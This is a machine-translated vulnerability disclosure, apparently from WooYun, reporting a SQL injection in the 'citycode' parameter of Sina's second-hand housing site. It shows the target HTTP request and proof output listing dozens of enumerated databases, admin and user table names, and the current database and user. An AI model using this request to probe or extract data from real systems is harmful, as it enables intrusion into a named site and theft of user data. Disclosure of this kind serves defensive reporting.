漏洞标题 新浪网站MySQL注入（支持三种查询/全市网站数据/管理员数据） 相关制造商 新浪 漏洞作者 Aasron 提交时间 2016-04-24 19: 58 公共时间 2016-06-11 15: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注入，注入技术，Mysql 漏洞详细信息 GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1 主机: cd.esf.sina.com.cn 连接:关闭 接受: */* 用户代理: Mozilla/5.0（iPhone; CPU iPhone OS 9_3_1，如Mac OS X）AppleWebKit/601.1.46（KHTML，如Gecko）Mobile/13E238 KoudailejuApp 接受语言: zh-cn Referer:http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdlj Accept-Encoding: gzip，deflate 新浪二手房网站 注射参数#citycode 漏洞证明：

布尔注入

UNION联合查询

全国64个图书馆 [*] information_sch [*] mysql [*] performance_sch [*] shop_admin [*] shop_anshan [*] shop_bt [*] shop_cc [*] shop_cd [*] shop_cq [*] shop_cs [*] shop_cz [*] shop_dg [*] shop_dl [*] shop_fs [*] shop_fushun [*] shop_fz [*] shop_gg [*] shop_gl [*] shop_gy [*] shop_gz [*] shop_haikou [*] shop_heb [*] shop_hf [*] shop_hhht [*] shop_huizhou [*] shop_hz [*] shop_jn [*] shop_km [*] shop_ks [*] shop_lanzhou [*] shop_lw [*] shop_nb [*] shop_nc [*] shop_nj [*] shop_nn [*] shop_nt [*] shop_qd [*] shop_qhd [*] shop_sanya [*] shop_sh [*] shop_sjz [*] shop_suzhou [*] shop_sy [*] shop_sz [*] shop_tangshan [*] shop_ty [*] shop_weifang [*] shop_weihai [*] shop_wh [*] shop_wlmq [*] shop_wuhu [*] shop_wx [*] shop_xian [*] shop_xm [*] shop_xz [*] shop_yangzhou [*] shop_yinchuan [*] shop_yt [*] shop_zb [*] shop_zhengzhou [*] shop_zhongshan [*] shop_zhuhai [*] shop_zz [*]测试 Ad_list AD_NAME Ad_time Community_distanceset Community_distanceset Community_stype Community_stype_set Community_stype_set_l Count_house_avgprice Dict_districtblock Dict_districtblock_me Es_home_compare Es_home_spider Es_pinzhuan_keyword Es_pinzhuan_keyword_w Es_pinzhuan_status Esf_acl_access Esf_acl_role Esf_acl_role_access Esf_acl_user Esf_acl_user_role Esf_city_price Esf_delegate_agent Esf_delegate_house Esf_delegate_pic Esf_home_apply Esf_home_fangjia Esf_home_info Esf_home_info_ext Esf_home_info_tmp_jia Esf_home_jiaju Esf_home_othername Esf_home_pic_fx Esf_home_pic_xq Esf_home_pinzhuan Esf_home_price Esf_home_relation Esf_home_score Esf_home_setting Esf_home_subway Esf_home_transfer Esf_home_user Esf_home_usertop Esf_home_weixin Esf_home_zhida Esf_house_chuchuang Esf_house_rzassign Esf_house_rzassign_lo Esf_house_rzassign_us Esf_house_tag Esf_house_urlwhite Esf_shop_house Esf_shop_house_assign Esf_shop_house_pic Esf_sitemap Esf_smsout Esf_user_helperpic Esf_user_mainhome Esf_user_shop Esf_weixin_log Esf_weixin_menu Esf_weixin_passport Esf_weixin_passport2 Esf_weixin_subscribe Esf_weixin_subscribe_ Esf_weixin_ticket Esf_weixin_ticket_use Esf_weixin_user Fnj_agent Job_distribute Job_log Mobile_pocketagent_bo Mobile_sendmessage_lo Push_data_log Sp_agentphone Sp_lime Sp_log Sp_member Sp_notice Sp_pay_log Sp_permission Sp_pwd_log Sp_role Sp_role_permission Sp_sys_user Sp_sys_userpermission Sp_user Sp_user_bj Sp_user_del_log Sp_user_ext Sp_user_ext_sh Sp_user_loginlog Sp_user_pic Sp_user_sh Sp_weixin_log Sp_weixin_user 测试 当前数据库：'shop_admin' 当前数据库用户：'[email  protected]/*％' 修理计划： 过滤 版权声明：请注明出处Aasron @乌云